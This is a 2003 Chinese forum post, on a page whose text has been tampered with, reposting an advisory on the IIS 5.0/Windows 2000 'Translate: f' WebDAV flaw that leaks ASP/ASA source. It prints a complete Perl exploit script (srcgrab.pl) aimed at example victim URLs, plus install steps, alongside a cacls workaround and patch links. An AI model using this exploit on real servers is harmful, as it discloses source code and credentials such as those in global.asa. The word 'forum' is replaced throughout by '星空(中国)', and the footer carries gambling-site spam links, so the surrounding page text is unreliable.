ZOL首页
产品报价
中关村商城
ZOL星空(中国)首页
更多星空(中国)
手机星空(中国) 摄影星空(中国) 硬件星空(中国) 笔记本星空(中国) 平板星空(中国) 兴趣圈子星空(中国)活动
手机客户端

数码爱好者必备神器

星空体育平台客户端

Android版 iPhone版
星空(中国)帮助

我可以：邀请好友来看>>

ZOL星空(中国) > 硬件星空(中国) > 系统软件与网络星空(中国) > XP系统星空(中国) > win2000的Translate:f问题泄露asp/asa文件

帖子很冷清，卤煮很失落！求安慰

签到

手机签到经验翻倍！
快来扫一扫！

win2000的Translate:f问题泄露asp/asa文件

198浏览 / 0回复

c999c 4 精华 133 帖子 c999c（ID:c999c） 4 精华133 帖子粉丝：16 关注：11 Z金豆：0 城市：北京注册时间：2008-09-02 最后登录：2009-12-31 进入个人中心>> 等级：Lv.1 经验：106 当前经验106分，升级还需174分下一等级：Lv.2如何升级？ Z金豆： 0 千万礼品等你来兑哦~快点击这里兑换吧~ 城市：北京注册：2008-09-02 登录：2009-12-31 关注私信	发表于 2003-11-20 13:10:04 只看楼主倒序浏览分享电梯直达楼确定楼主
	[URL=http://forums.zol.com.cn/new/diary_list.php?userid=c999c]我的日记！[/URL 安全焦点参考资料: Translate:f summary, history and thoughts by ddoc@MIA.CZ 一、漏洞信息在win2000及office 2000(包括FrontPage 2000及FrontPage 2000 server extensions)里的WebDAV存在着一个安全问题Translate:f。当某人往目标机器的ASP/ASA(或者其它脚本文件)发送包含有"Translate:f"文件头的HTTP GET请求时， windows2000(没有打过SP1补丁的——现在打补丁的还不是很多吧:)会返回该ASP/ASA的源代码而不是本该返回的经过处理的文件(还需要在url的结尾加上一个特殊字符"/")。虽然这个漏洞出现于windows2000，但由于有些站点虽然仅使用IIS 4.0，但却安装了FrontPage Server Extensions 2000，所以这一影响可能会扩展到IIS 4.0的机器上。二、利用方法 smiler就此漏洞发表了一个用perl写成的利用程序： -----------------------------start------------------------------------------------ #!/usr/bin/perl # Expl0it By smiler@vxd.org # Tested with sucess against IIS 5.0. Maybe it works against IIS 4.0 using a shared drive but I haven磘 tested it yet. # Get the source code of any scripq from the server using this exploit. # This code was written after Daniel Docekal brought this issue in BugTraq. # Cheers 351 and FractalG :) if (not $ARGV[0]) { print qq~ Geee it磗 running !! kewl :))) Usage : srcgrab.pl Example Usage : srcgrab.pl http://www.victimsite.com/global.asa U can also save the retrieved file using : srcgrab.pl http://www.victim.com/default.asp > file_to_save ~; exit;} $victimurl=$ARGV[0]; # Create a user agent object use LWP::UserAgent; $ua = new LWP::UserAgent; # Create a request my $req = new HTTP::Request GET => $victimurl . '\'; # Here is the backslash at the end of the url ;) $req->content_type('application/x-www-form-urlencoded'); $req->content_type('text/html'); $req->header(Translate => 'f'); # Here is the famous translate header :)) $req->content('match=www&errors=0'); # Pass request to the user agent and get a response back my $res = $ua->request($req); # Check the outcome of the response if ($res->is_success) { print $res->content; } else { print $res->error_as_HTML; } ---------------------------------end--------------------------------------- 要使用这一程序，你可能需要下载几个perl的模块(可以到 http://www.perl.org上去search:) 1、libwww-perl-5.48.tar.gz 2、URI-1.09.tar.gz 3、HTML-Parser-3.11.tar.gz 每个包只有几十K大吧，下载解包后进入目录，运行 #perl Makefile.PL&&make&&make install 就可以了。have fun :) (昨天出了洋相，在url后面加了个?，可以访问到部份asp，自以为得手，洋洋自得，大加吹嘘，后来朋友指出，返回的是处理过的代码，而不是源码，猛然醒悟，大为狼狈，特加此注，自己来点警告) 三、解决方案： 1、nsfocus的adam提出了临时解决方案如下：中文版： iisreset /stop c: cd WINNTsystem32inetsrv cacls httpext.dll /d everyone Are you sure (Y/N)?y iisreset /start 2、正式方案下载并安装补丁: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=23769或 http://download.microsoft.com/download/win2000platform/Patch/Q256888/NT5/EN-US/Q256888_W2K_SP1_x86_en.EXE 也可以通过安装 Windows 2000 Service Pack 1来解决这个问题： http://www.microsoft.com/windows2000/downloads/recommended/sp1/http://202.101.106.13/ 下载ZOL客户端，随时随地与大家交流发表回复表情高级回复回复评分收藏赞
	楼主热贴制作PE启动U盘过程图解 u盘启动系统硬盘安装XP系统过程图解原装深度6.2绝版 MD5码相符卡巴斯基最新激活码到2007／11／18 安装版xp系统下载地址相关推荐 win2000的Translate:f问题泄露asp/asa文件别让宗教的魔性的邪魔气魔色死了。翻译666 治愈系游戏大全十大必玩治愈系游戏精选回合战略游戏哪个好好玩的回合战略游戏精选个性签名：无分享到：看科技短视频，用ZOL APP 举报只看此人回复评分

高级模式

发表回复 Ctrl+Enter快捷发布积分规则

星空(中国)精选大家都在看24小时热帖7天热帖大家都在问最新回答

针对ZOL星空(中国)您有任何使用问题和建议您可以联系星空(中国)管理员、查看帮助或给我提意见

快捷回复 APP下载返回列表

开云手机版登录入口-开云(中国)官方 | 欧宝手机平台-欧宝(中国) | KY.COM-开元(中国) | 星空体育网页版-星空体育(中国)官方网站登录界面 | 华体会手机端-华体会官网(中国) | B体育平台-B体育(中国)一站式服务平台 | 开云网页版登录入口-开云（中国） | 开云手机版登录入口-开云(中国)官方 | 开云网页版-开云（中国）官方在线登录 |